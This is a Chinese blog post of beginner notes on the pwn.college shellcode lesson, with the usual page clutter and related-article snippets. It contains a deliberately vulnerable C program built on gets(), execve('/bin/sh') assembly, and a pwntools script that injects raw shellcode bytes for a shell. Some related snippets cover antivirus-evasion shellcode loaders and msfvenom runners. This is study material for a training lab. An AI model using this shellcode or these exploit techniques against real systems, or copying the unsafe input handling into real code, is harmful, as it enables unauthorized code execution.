PwnCollege shellcode第一章

最新推荐文章于 2024-07-03 18:24:18 发布
最新推荐文章于 2024-07-03 18:24:18 发布
阅读量747 收藏 1
点赞数 1
分类专栏: pwn 新手 ctf 文章标签: c语言 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51687381/article/details/124820862
版权
新手 同时被 3 个专栏收录
23 篇文章 0 订阅
订阅专栏
ctf
15 篇文章 0 订阅
订阅专栏
pwn
11 篇文章 0 订阅
订阅专栏

课程https://www.youtube.com/watch?v=715v_-YnpT8

漏洞程序 hello.c

void bye1(){ puts("Goodbye!"); }
void bye2(){ puts("Farewell!"); }
void hello(char * name ,void (* bye_func)()){
 	printf("Hello , %s\n",name);
	bye_func();
}
int main(int argc,char **argv){
	char name[1024];
	gets(name);
	srand(time(0));
	if(rand()%2) hello(bye1,name);
 	else hello(name,bye2);
}

GCC编译,1/2的概率程序崩溃

shellcode.s

.global _start           #.global定义一个全局符号 _start 为程序的入口
_start:                  # _start: 标志程序入口
.intel_syntax noprefix   #intel代码格式
  	mov rax, 59          #系统调用号  
	lea rdi, [rip+binsh] #binsh偏移
	mov rsi, 0
	mov rdx, 0
	syscall
binsh:                  #binsh标号
	.string "/bin/sh"   #.string 标志string类型

编译运行

objdump 看一下section

 其实到这里对于shellcode已经是可以使用了。

from pwn import *
context.log_level = 'debug'
p=process('./hello')
payload="\x48\xc7\xc0\x3b\x00\x00\x00\x48\x8d\x3d\x10\x00\x00\x00\x48\xc7\xc6\x00\x00\x00\x00\x48\xc7\xc2\x00\x00\x00\x00\x0f\x05\x2f\x62\x69\x6e\x2f\x73\x68\x00"
p.sendline(payload)
p.interactive()

 视频中演示了另一种方法,利用objcpoy 将代码段部分转移到shellcode-raw文件中

 (hd   hexdump)用十六进制把二进制文件打印出来

 利用管道符(这行指令还没太看明白,但是用的应该不多,不去深究了)

Hush^
关注
专栏目录
手戳shellcode编写 第一课(动态函数地址调用函数)
啊渊的专栏
08-21 173
在程序免杀中,我们通常不会直接通过函数名称方式来调用函数,一般都是通过执行shellcode来执行我们需要的代码。如果直接将exe文件解析出来的shellcode会发现这些shellcode不能直接运行,因为函数地址调用的问题。因此我们需要动态获取函数地址来调用shellcode。为了了解shellcode的基础,我们先使用c++源码方式来学习,如果动态的获取函数地址,然后再使用汇编编写以下功能实现shellcode的完成编写。
如何使用pwncollege/dojo:一个全面的指南
最新发布
gitblog_00280的博客
08-21 263
如何使用pwncollege/dojo:一个全面的指南 dojoInfrastructure powering pwn.college dojo项目地址:https://gitcode.com/gh_mirrors/dojo1/dojo 项目简介 pwncollege/dojo 是一个基于GitHub的开源项目,它旨在提供一个用于学习和实践网络安全技能的环境。虽然具体的项目细节和目的在官方REA...
pwncollege:部署pwn.college
02-24
大学 该存储库具有部署pwn.college实例所需的工件。 设置 docker build -t pwncollege_challenge containers/pwncollege_challenge cp -r CTFd-pwn-college-plugin CTFd/CTFd/plugins docker-compose up -d docker run --detach --name nginx-proxy --publish 80:80 --publish 443:443 --volume /etc/nginx/certs --volume $PWD /conf/nginx/vhost.d:/etc/nginx/vhost.d --volume /usr/share/nginx/html --volume /var/run/docker.sock:/tmp/docker.soc
菜鸡的PWNcolloge-ROP(好难)
weixin_50852871的博客
07-03 1573
win1和win2各输出一半的flag,我当时写题的时候就愣住了,这咋搞啊,用gadget里面的pop rdi ret来传,后来发现不对,是我想麻烦了,直接溢出+win1地址+win2地址就好了。大致翻译就是想要得到flag,你得先溢出如何让后面函数传入相应的值,比如win1的函数的参数就是1,如果不是1就得不到flag,win2的函数参数是2,win3是3,以此类推。静态分析的话也可以分析出来,函数前面做了一共if判断,如果不是1就退出,所以要函数传入的参数为1,win2345都是一样的。
pwn.college笔记
BL_zshaom的博客
05-19 2518
Level① 直接运行challenge目录下的enbeyoio_level1(目标文件) Level② 运行目标文件后需要输入密码,直接输入密码就行 Level③ 运行目标文件后,报告提示需要使args[1]的值等于一个提示上给的值: 使用embryoio_level3 (value) 即可 Level④ 设置环境变量 export xxx = xxx Level⑤ 重定向输入(>)重定向输出(<) 这道题考的是重定向输入 需要在tmp目录下,重定向输入一个题上给的文件名,然后执行 ./embryoio_
Pwncollege:Program Interaction
m0_53932372的博客
01-04 1053
这题很奇怪 直接返回到主目录,然后进入challenge目录,执行程序即可。
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
pwncollege.github.io
02-19
pwncollege.github.io
第六十八课:基于Ruby内存加载shellcode第一季1
08-03
基于Ruby内存加载shellcode第一季 本资源是一个关于APT攻击与防御的教程,专门介绍基于Ruby内存加载shellcode的技术。该教程着重于msf无文件渗透的基础过渡,并为msf插件编写做基础过渡。 Ruby shellcode 生成 ...
第六十八课:基于Ruby内存加载shellcode第一季.docx
09-15
根据提供的文档信息,本文将详细解释“第六十八课:基于Ruby内存加载shellcode第一季”中的关键知识点。主要内容包括理解shellcode的概念、如何利用Ruby语言生成shellcode以及如何在内存中加载并执行shellcode。 ##...
rs_shellcode:另一个shellcode运行器
05-23
rs-shellcode 在Rust中编写的shellcode运行器使用 。 如何使用它 安装 ,使用每晚toochain。 rustup default nightly 使用msfvenom生成shellcode进行测试。 msfvenom -p windows/x64/exec CMD=calc.exe --...
挑战:一组预先生成的pwn.college挑战
03-03
pwn.college 一组预先生成的pwn.college挑战! 设置 将<INSTANCE>替换为实例的名称: ./generate_sql.sh | docker exec -i < INSTANCE> _db mysql -uctfd -pctfd -Dctfd 警告 当前存在一个问题,其中在pwn.college基础结构中,docker映像名称只能为32个字节长。 为了解决这个问题: docker tag pwncollege/pwncollege_challenge pwncollege_challenge docker tag pwncollege/pwncollege_kernel_challenge pwncollege_kernel_challenge
pwn_journey
02-18
pwn_journey 我一直对二进制开发很着迷。 想象一下,能够控制程序的功能,并使其执行应有的功能吗? 对我而言,这真是骇客。 所以我想学习它。 该存储库是我进行铺砌的旅程和经验。 您为什么不建立博客呢? 使用Jekyll? 任何事物? 好吧,因为我懒得他妈的。
用c++写一个最简单的内核(只有几百行代码,编译通过)
04-08
用c++写一个最简单的内核(只有几百行代码,编译通过)
红队免杀培训第一章-不可执行的shellcode
Gamma_lab的博客
03-05 618
临近全国hw,后面会陆续推出红队免杀培训文章,希望能到诸君能在赛场上乱免,不会把现成的加载器放出来,但是例子改一下就是一个好的加载器,强调一遍,免杀并不是一种技术的一支独秀,而是百花齐放! 前言: ​ 这里照常去做CS的免杀加载器的实现,因为用先有的c2框架是非常方便顺手,当然你自己开发的c2框架也行,肯定也有生成shellcode这个功能,也需要进行内存执行的需求。 ​ 今天要讲的这种原理是根据ntdll.dll先有的指令来执行我们的代码,恶意代码保存在于数据部分中,这种的好处是我们绕过了不可执行的内
pwncollege基本使用与scp下载
m0_53932372的博客
07-25 607
这个指令我就不多说了,-i key输入私钥,/challenge/babyrev_level3.0文件,./当前目录。尤其是re的题目,用浏览器看ida非常卡,最好下载下来再做。连接成功,不过我没有开启题目,所以没有让我连接。settings 下面的sshkey,粘贴进去。注意,这个指令的终端要和key在同一个目录。我连接失败了,看来scp我不是很熟悉。key.pub 公钥,全部复制。这个指令,生成 公钥和私钥。这就要用到scp指令了。应该是会要求输入私钥的。key.pub 公钥。
探索网络安全的新天地:pwn.college DOJO
gitblog_00084的博客
06-08 392
探索网络安全的新天地:pwn.college DOJO dojoInfrastructure powering pwn.college dojo项目地址:https://gitcode.com/gh_mirrors/dojo1/dojo 在网络安全的广阔领域中,学习与实践是通往大师之路的关键。今天,我们将深入探讨一个专为此目的设计的强大工具——pwn.college DOJO。这不仅仅是一个平台...
BUUCTF(pwn)starctf_2019_babyshell
半岛铁盒的博客
04-06 381
这里要求我们需要输入一个SHellcode 然后进入 一个 if 比较; 只需要通过\x00绕过检查, 同时执行我们输入的shellcode \x00B后面加上一个字符, 对应一个汇编语句。 所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查 from pwn import * context.arch = "amd64" p = remote("node3.buuoj.cn",27993) payload = '\x00B3' + asm(shellcraft.sh()) p...
写一段shellcode
09-05
这是一个简单的 shellcode,它会在 Linux 系统上打开一个终端窗口: ``` \x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 ``` 这段 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值